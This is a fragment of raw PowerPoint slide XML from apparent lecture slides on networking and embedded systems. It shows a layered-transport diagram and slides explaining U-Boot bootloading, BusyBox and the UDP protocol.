                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>transport</a:t>
              </a:r>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24" name="Line 228">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C006EB7D-1636-6A4F-A9F1-4BE0F74802AD}"/>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5" name="Line 229">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{41A82FA3-39CD-E643-9F95-87ECA32681D0}"/>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6" name="Line 230">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4C59DF7-8C2A-A349-8C9B-92006D307A9B}"/>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27" name="Group 231">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F43BF83-F9A4-4B4A-9C1B-EC382CA62B5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10944845" y="4811999"/>
            <a:ext cx="814388" cy="854075"/>
            <a:chOff x="4180" y="744"/>
            <a:chExt cx="513" cy="538"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849128" name="Rectangle 232">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C8EE3BF-B71B-D448-B266-AD1EBEF5A07D}"/>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9" name="Rectangle 233">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4F442FF-55AC-1F4F-9CC7-E90DE3E11857}"/>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0" name="Rectangle 234">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{59EE6862-9025-1442-B521-58803F22CF9C}"/>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1" name="Text Box 235">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFA4E3D6-3E1A-9F42-9632-C898F2451C23}"/>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latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>application</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="0" hangingPunct="0"/>
              <a:r>
                <a:rPr lang="en-US" altLang="en-US" sz="1000">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>transport</a:t>
              </a:r>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32" name="Line 236">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81D2DC6E-C7B4-1B4F-9B64-417CF5DD4F34}"/>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3" name="Line 237">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EE06C8C8-BF97-7140-BFC1-486289F44C73}"/>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4" name="Line 238">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1BD98B6F-23CC-D643-8CD2-207C07BA72B6}"/>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35" name="Group 239">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A6A7D53-6886-6243-BC45-E5624DEC7D64}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10282859" y="3930936"/>
            <a:ext cx="814387" cy="701675"/>
            <a:chOff x="2923" y="3345"/>
            <a:chExt cx="513" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849136" name="Rectangle 240">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85E261F5-91F2-8B4D-BE8D-5F4208650A7D}"/>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7" name="Rectangle 241">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B84C0B67-B250-CB4D-80EB-A645117BB892}"/>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8" name="Text Box 242">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{255B8A2B-8929-DA41-BCE0-41F1C9811ADB}"/>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39" name="Line 243">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BBFBA89A-71D7-CB4B-AF02-7EA6953E91C0}"/>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0" name="Line 244">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9ED31C85-4C4C-D242-881F-2243969F70FC}"/>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41" name="Group 245">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E59ACF0D-EC83-C94D-970B-81DF63EA1589}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="10816259" y="3349911"/>
            <a:ext cx="814387" cy="701675"/>
            <a:chOff x="2923" y="3345"/>
            <a:chExt cx="513" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849142" name="Rectangle 246">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A97DE094-B1E5-1442-99EC-62CAFB7A345E}"/>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3" name="Rectangle 247">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C81FAEB-1827-C747-9186-3BB8E766AFEE}"/>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4" name="Text Box 248">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5FD0A8F-9A25-F04F-933A-30875F27B6AE}"/>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45" name="Line 249">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C3448229-F14F-EE46-82F0-84BE9883274C}"/>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6" name="Line 250">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8235A45-1BE7-FB4B-A197-E9C34A663EAD}"/>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47" name="Group 251">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9EE40752-E6ED-6249-8AC9-1EF732E7DFAE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9930434" y="3045111"/>
            <a:ext cx="814387" cy="701675"/>
            <a:chOff x="2923" y="3345"/>
            <a:chExt cx="513" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849148" name="Rectangle 252">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{851EA224-8837-4E4B-A3BD-7BD314F83730}"/>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9" name="Rectangle 253">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7C36E4B-103E-0A46-AF04-F21D2AAACB32}"/>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0" name="Text Box 254">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AC10311-2127-D04C-B0C8-A311CF88BF5E}"/>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51" name="Line 255">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4713A91-7549-A948-9558-49AE1A8D75AE}"/>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2" name="Line 256">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6C62315B-5D03-4E41-8429-FD9CD32B4645}"/>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53" name="Group 257">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9B2C6EE8-B141-0447-87FC-E225DDD9E98B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="9863759" y="2273586"/>
            <a:ext cx="814387" cy="701675"/>
            <a:chOff x="2923" y="3345"/>
            <a:chExt cx="513" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849154" name="Rectangle 258">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6B808FC-1892-5F42-A493-4AA2F57A16E5}"/>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5" name="Rectangle 259">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08FA339E-5F59-7B4B-B66D-5AF51501C143}"/>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6" name="Text Box 260">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1EDEF70B-211D-ED4A-B1A7-7A0B52C3FC45}"/>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57" name="Line 261">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{71102636-E251-F640-AC93-DF9635C7FBA9}"/>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8" name="Line 262">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{989CF642-D986-FD42-BCDC-E2A84728DC35}"/>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59" name="Group 263">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{951CCEA6-01FC-D543-905C-9B1359340A14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm>
            <a:off x="8930309" y="2559336"/>
            <a:ext cx="814387" cy="701675"/>
            <a:chOff x="2923" y="3345"/>
            <a:chExt cx="513" cy="442"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849160" name="Rectangle 264">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{13944D56-666E-854B-BA37-6156F3DBE47B}"/>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1" name="Rectangle 265">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C59EACAC-6054-324B-BA73-C86AB211581D}"/>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2" name="Text Box 266">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AF327AB-4BF1-A240-B0D5-92C0E5867478}"/>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63" name="Line 267">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6AE964C3-2164-684F-A633-1FACF31F307C}"/>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4" name="Line 268">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE5B283D-5D40-B64F-B59A-5BDA1248C736}"/>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65" name="Group 269">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AEAF17E-9AEE-DC45-8114-E03DF1C178EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr>
            <a:grpSpLocks/>
          </p:cNvGrpSpPr>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr bwMode="auto">
          <a:xfrm rot="2937887">
            <a:off x="7876209" y="3378486"/>
            <a:ext cx="3781425" cy="434975"/>
            <a:chOff x="2937" y="3579"/>
            <a:chExt cx="2382" cy="274"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849166" name="Rectangle 270">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08A60A82-DDC2-894B-8B6D-DD608F2E9446}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3168" y="3630"/>
              <a:ext cx="1920" cy="17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7" name="Text Box 271">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66B3E232-99B1-9F43-9557-DBC55F172F60}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1">
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="3343" y="3617"/>
              <a:ext cx="16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dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
                </a:rPr>
                <a:t>logical end-end transport</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" altLang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Comic Sans MS" panose="030F0902030302020204" pitchFamily="66" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="849168" name="Freeform 272">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{256F81CF-218B-6048-86E0-0A774699E6B7}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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Lst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">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9" name="Freeform 273">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7000FB30-6856-C74E-A31F-AA2414BC16E1}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>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Lst>
              <a:ahLst/>
              <a:cxnLst>
                <a:cxn ang="0">
                  <a:pos x="T0" y="T1"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T2" y="T3"/>
                </a:cxn>
                <a:cxn ang="0">
                  <a:pos x="T4" y="T5"/>
                </a:cxn>
                <a:cxn ang="0">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5" name="TextBox 274">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{45D05365-917F-E444-9F8F-018712305ED7}"/>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56335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19" y="113983"/>
            <a:ext cx="11401063" cy="868362"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Early initialization and u-boot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a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{844A2C2D-B492-5D44-BC9C-8C0F743F27E9}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="364381" y="1514558"/>
            <a:ext cx="11112137" cy="43095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dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The proprietary first stage loader (e.g.- BIOS on PC’s) initializes low level functions and loads the next stage bootloader.  The most complicated part of this stage of initialization is conditioning DRAM.  DRAM initialization is complex: see, for example,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400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Final stage bootloaders customize boot selections and offer the first opportunity for user interaction (via, say, by connecting to an on-board UART).  In addition to selecting the partition and OS to be booted, it allows reading and writing of files before the OS boots.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The common IoT Bootloader is Uboot (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>s</a:t>
            </a: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ource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent3"/>
                </a:solidFill>
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>.  (On PC’s, the corresponding bootloader is GRUB.)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The job of the final state bootloader is to read the operating system kernel into memory and transfer control to it.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>The OS is in charge after that.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900" algn="l">
              <a:spcBef>
                <a:spcPts val="400"/>
              </a:spcBef>
              <a:buFont typeface="Arial" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" charset="0"/>
              </a:rPr>
              <a:t>Uboot has most of the busybox utilities. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>BusyBox combines tiny versions of many common UNIX utilities into a single small executable. The utilities in BusyBox generally have fewer options than their full-featured GNU cousins. BusyBox provides a fairly complete environment for any small or embedded system.” --- Busybox.net</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000"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57040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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91C8A01A-A9D6-4D41-B542-BD6B09617FB5}"/>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C524B5F0-3740-7A4D-A36B-F84CE1A47B56}" type="slidenum">
              <a:rPr lang="en-US" altLang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>60</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893954" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9D27A693-F8CD-9049-9A86-CAA138A4FB4F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="441181" y="103909"/>
            <a:ext cx="11471563" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="en-US" sz="4400" dirty="0">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>UDP: Unreliable Message Delivery Service</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893955" name="Rectangle 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{97002146-689C-2B49-B1F8-AB7447FF1176}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="841672" y="1384207"/>
            <a:ext cx="10508656" cy="2171026"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:norm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Lightweight communication between processes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Avoid overhead and delays of ordered, reliable delivery</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 messages to and receive them from a socket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User Datagram Protocol (UDP)</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IP plus port numbers to support (de)multiplexing</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Optional error checking on the packet contents</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="893956" name="Rectangle 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ECF83C17-A06B-4246-AC3B-E5AE98D0358C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4416425" y="4105850"/>
            <a:ext cx="1760538"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7" name="Rectangle 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76DC8FA5-F4EB-DD4F-944E-80247D946711}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6176964" y="4105850"/>
            <a:ext cx="1760537"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8" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C6D46216-024D-B846-8D94-2356422B3405}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
